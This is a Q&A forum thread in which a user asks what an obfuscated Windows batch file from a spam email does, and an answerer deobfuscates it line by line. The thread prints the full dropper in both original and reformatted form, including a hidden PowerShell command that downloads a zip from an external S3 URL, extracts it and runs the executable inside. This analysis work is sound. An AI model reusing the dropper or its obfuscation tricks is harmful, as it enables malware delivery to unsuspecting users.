# What would this windows batch file do

Tags: shell, parsing, batch-file, virus

I received this program through a spam email and I have no idea what it would do had I executed it.

Altough I use macOS and know it wouldn't harm my machine I am pretty sure it's a virus, so I want to understand it.

My guess is that it changes the values of the characters to other character to make it unreadable.

There is also a fragmented link at the end.

```
cls
@echo off
setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
set len=3
set charpool=0123456789abcdefghijlmnopqrstuvxz
set len_charpool=16
set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=
for /L %%b IN (1, 1, %len%) do (
  set /A rnd_index=!RANDOM! * %len_charpool% / 32768
  for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=!NHCf_bQIkNU_N_DE__KlMM_YNchRbY!%%i
)
set ZdHy_v_fyF=a
set ZgGEYqErM___uhIAWjNJ=b
set P__JXjQl____B_zA=c
set Cnj_NdJ=d
set XivmzFFG___rc_I=e
set MGE_Jp_yjrnuydCY__zWudMUmm__A=f
set ICMPRKHvGxGlqYbvqU=g
set CnNaDuPWL__aCJbmYawO_XjI_yQ=h
set Yq_cgTV___OgMaat_VfP=i
set MJcfRtoeVwMDZ=j
set IyypGJJHieiPDkK_VvH_kWaBDADfU=k
set ST__sVoOCkBtOSu_HC=l
set DqJ_t_keWA_uetGRNsrgZCelOIQ=m
set Bpnnp_SNZcQBiJN=n
set MMvmaGXgBQ_nHZ=o
set EuxpUwQe_bUWbrg_KQ=p
set OOhhHfJZYpK_Y=q
set OQLPyY=r
set ZmWecoFDM=s
set LHJiJU=t
set SbVCD=u
set DrxJWqvnnMzGPCWhMQ=v
set XfyZEmN_UzM_tAlI=w
set IDHE_R=x
set I_Ohy_MOkJQDcatjk_pX=y
set LFgTA_NYO_YBpU=z
set AfyLB_hDkohaG=0
set Bi__eZ_rqfjZTdY_QJ_W_nuNKFMkVFM=1
set SRW_ft_avO_FuMY=2
set Y_A_q_TYWVQbqF_qQ__ncLfolUsDI=3
set IBuFjVvfpcx_f_yYNCj_cZjJczmV=4
set ZcDjFcQHZ_zMIALohJYzEBILhH=5
set LHaI_YWR_Yr_xdGET__s_ChnMfJTMC=6
set FtOBCHc__YEKXfREpPT__xqKJStxdZS=7
set YddJGsUdIcc_HF=8
set EsTG_b_ew_TaPO=9

set ghdt2d= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN=%Programdata%\--___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2=%Programdata%\T__aB__VtZ_CAgauukskJ_oFeEW_fG
IF EXIST  %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2%
IF EXIST  %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%
set Dl_pgTsLKvB_YUzB_quExlvqy_jMpO=%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.zip
set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp"
set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump2.exe"

set dado1="http"
set dado2="s://corni43uuy.s3"
set dado3="-eu-west-1.am"
set dado4="azonaws.com/image2.png"
powershell.exe -windowstyle hidden -Command  "& {Import-Module BitsTransfer;Start-BitsTransfer ('%dado1%%dado2%%dado3%%dado4%') '%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%');foreach($item in $zip.items()){$shell.Namespace('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');rename-item -path ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');remove-item '%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%';Start-Sleep -s 5 ;Start-Process ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.exe')}"
```

Comment: Was there an enticement to invoke that script? It could part of a blended attack of kind. If you received this on a machine you use for work, report it immediately to your company  admins/security.

Answer (score 1):

Apologies for the long delay. Life interceded multiple times...

Starting with the first block:

```
set len=3
set charpool=0123456789abcdefghijlmnopqrstuvxz
set len_charpool=16
set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=
for /L %%b IN (1, 1, %len%) do (
  set /A rnd_index=!RANDOM! * %len_charpool% / 32768
  for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=!NHCf_bQIkNU_N_DE__KlMM_YNchRbY!%%i
)
```

Changing the names so as not to trigger any local alarms we have:

```
>type test.cmd
@setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
@set len=3
@set charpool=0123456789abcdefghijlmnopqrstuvxz
@set len_charpool=16
@set _altPool=
@for /L %%b IN (1, 1, %len%) do @(
    @set /A rnd_index=!RANDOM! * %len_charpool% / 32768
    @for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do @set _altPool=!_altPool!%%i
    @echo _altPool == !_altPool!
)


>test.cmd
_altPool == 1
_altPool == 11
_altPool == 11a
>
```

So it appears to generate three random characters in `NHCf_bQIkNU_N_DE__KlMM_YNchRbY`.

---

Lines 12..47 create random environment variables set to lowercase ASCII alpha numeric characters, but they are not used anywhere in the batch script. They may just be a poor attempt at obfuscation, or they may be used by other payload later on, possibly for entropic behavior in a lame attempt to avoid detection.

---

#49 appears to be a obfuscation. Here is does refer to our three characters in `NHCf_bQIkNU_N_DE__KlMM_YNchRbY`, but `ghdt2d` is never used in the script.

```
set ghdt2d= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
```

This followed immediately by:

```
set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
```

And `S_p_BzRKgYKgQ_KCn_LF` is used later in the script:

```
Find all "S_p_BzRKgYKgQ_KCn_LF"
File Untitled<1>
  50 5:set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
  51 22:set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
  58 70:set Dl_pgTsLKvB_YUzB_quExlvqy_jMpO=%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.zip
  66 481:...T_YnN%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');rename-item -path ('%D...  [line truncated]
  66 586:..._YnN%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');remove-item '%Dl_pgTsL...  [line truncated]
  66 729:...V_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.exe')}"  [line truncated]
Total found: 6
```

And now it gets interesting...

---

Lines 50..60 appear to be setting path/file name variables with a bit more obfuscation than the rest of the script.

```
set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN=%Programdata%\--___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2=%Programdata%\T__aB__VtZ_CAgauukskJ_oFeEW_fG
IF EXIST  %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2%
IF EXIST  %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%
set Dl_pgTsLKvB_YUzB_quExlvqy_jMpO=%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.zip
set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp"
set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump2.exe"
```

There is no `FIM` label to `goto` in the script, so they appear to be an obfuscated means of exiting the script if those file system objects exist.

And the updated test script yields:

```
>type test.cmd
@setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
@set len=3
@set charpool=0123456789abcdefghijlmnopqrstuvxz
@set len_charpool=16
@set _entropy=
@for /L %%b IN (1, 1, %len%) do @(
    @set /A rnd_index=!RANDOM! * %len_charpool% / 32768
    @for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do @set _entropy=!_entropy!%%i
    @echo _entropy == !_entropy!
)

set _zipFileName= --___--_%_entropy%
REM Obfuscation: set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
set _zipFileDirectory=%Programdata%\--___--_%_entropy%
set _zipFileDirectory2=%Programdata%\T__aB__VtZ_CAgauukskJ_oFeEW_fG
@IF EXIST  %_zipFileDirectory2% GOTO FIM
REM mkdir %_zipFileDirectory2%
@IF EXIST  %_zipFileDirectory% GOTO FIM
REM mkdir %_zipFileDirectory%
set _zipPathFileName=%_zipFileDirectory%\%S_p_BzRKgYKgQ_KCn_LF%.zip
REM Ofbuscation: set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "%_zipFileDirectory%\dump.dmp"
REM Obfuscation: set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "%_zipFileDirectory%\dump2.exe"

set dado1="http"
set dado2="s://corni43uuy.s3"
set dado3="-eu-west-1.am"
set dado4="azonaws.com/image2.png"
REM powershell.exe -windowstyle hidden -Command  "& {Import-Module BitsTransfer;Start-BitsTransfer ('%dado1%%dado2%%dado3%%dado4%') '%_zipPathFileName%';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('%_zipPathFileName%');foreach($item in $zip.items()){$shell.Namespace('%_zipFileDirectory%').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('%_zipFileDirectory%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');rename-item -path ('%_zipFileDirectory%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');remove-item '%_zipPathFileName%';Start-Sleep -s 5 ;Start-Process ('%_zipFileDirectory%\%S_p_BzRKgYKgQ_KCn_LF%.exe')}"



>test.cmd
_entropy == 4
_entropy == 45
_entropy == 45b

>set _zipFileName= --___--_45b

>REM Obfuscation: set LEG_bBk_Nyos_T=

>set _zipFileDirectory=C:\ProgramData\--___--_

>set _zipFileDirectory2=C:\ProgramData\T__aB__VtZ_CAgauukskJ_oFeEW_fG

>REM mkdir C:\ProgramData\T__aB__VtZ_CAgauukskJ_oFeEW_fG

>REM mkdir C:\ProgramData\--___--_

>set _zipPathFileName=C:\ProgramData\--___--_\.zip

>REM Ofbuscation: set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "C:\ProgramData\--___--_\dump.dmp"

>REM Obfuscation: set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "C:\ProgramData\--___--_\dump2.exe"

>set dado1="http"

>set dado2="s://corni43uuy.s3"

>set dado3="-eu-west-1.am"

>set dado4="azonaws.com/image2.png"

>REM powershell.exe -windowstyle hidden -Command  "& {Import-Module BitsTransfer;Start-BitsTransfer ('"http""s://corni43uuy.s3""-eu-west-1.am""azonaws.com/image2.png"') 'C:\ProgramData\--___--_\.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\--___--_\.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\--___--_').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\--___--_\dump.dmp') -newname ('.dmp');rename-item -path ('C:\ProgramData\--___--_\dump2.dmp') -newname ('.exe');remove-item 'C:\ProgramData\--___--_\.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\--___--_\.exe')}"
>
```

Leaving just the final PS invocation, which can be reformatted to something like this:

```
{
   Import-Module BitsTransfer;
   Start-BitsTransfer ('%dado1%%dado2%%dado3%%dado4%') '%_zipPathFileName%';
   Start-Sleep -s 5 ;
   $shell = new-object -com shell.application;$zip = $shell.NameSpace('%_zipPathFileName%');
   foreach($item in $zip.items())
   {
      $shell.Namespace('%_zipFileDirectory%').copyhere($item);
   };
   Start-Sleep -s 5 ;
   rename-item -path ('%_zipFileDirectory%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');
   rename-item -path ('%_zipFileDirectory%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');
   remove-item '%_zipPathFileName%';
   Start-Sleep -s 5 ;
   Start-Process ('%_zipFileDirectory%\%S_p_BzRKgYKgQ_KCn_LF%.exe')
}
```

The one remaining original variable `S_p_BzRKgYKgQ_KCn_LF` is never set by the script, so it will be empty. I suspect this script doesn't work as intended. But the intent seems to have been to either waste our time analyzing it, or possibly to download and execute something. Without access to the image file, it is impossible to know exactly what it was intended to do.

The referenced image file at `https://corni43uuy.s3-eu-west-1.amazonaws.com/image2.png` is no longer available:

```
<Error>
 <Code>AllAccessDisabled</Code>
 <Message>All access to this object has been disabled</Message>
 <RequestId>F6D9EB7F64EA04A4</RequestId> 
 <HostId>WCiK2wokFJup1kWVnCRqVX43sM2NPLFeuU/WnJ1PK4uqZvo1IhH0ppgn9o4nGxX2158jqsPw+wQ=</HostId>
</Error>
```

Google did not turn up any references to that link.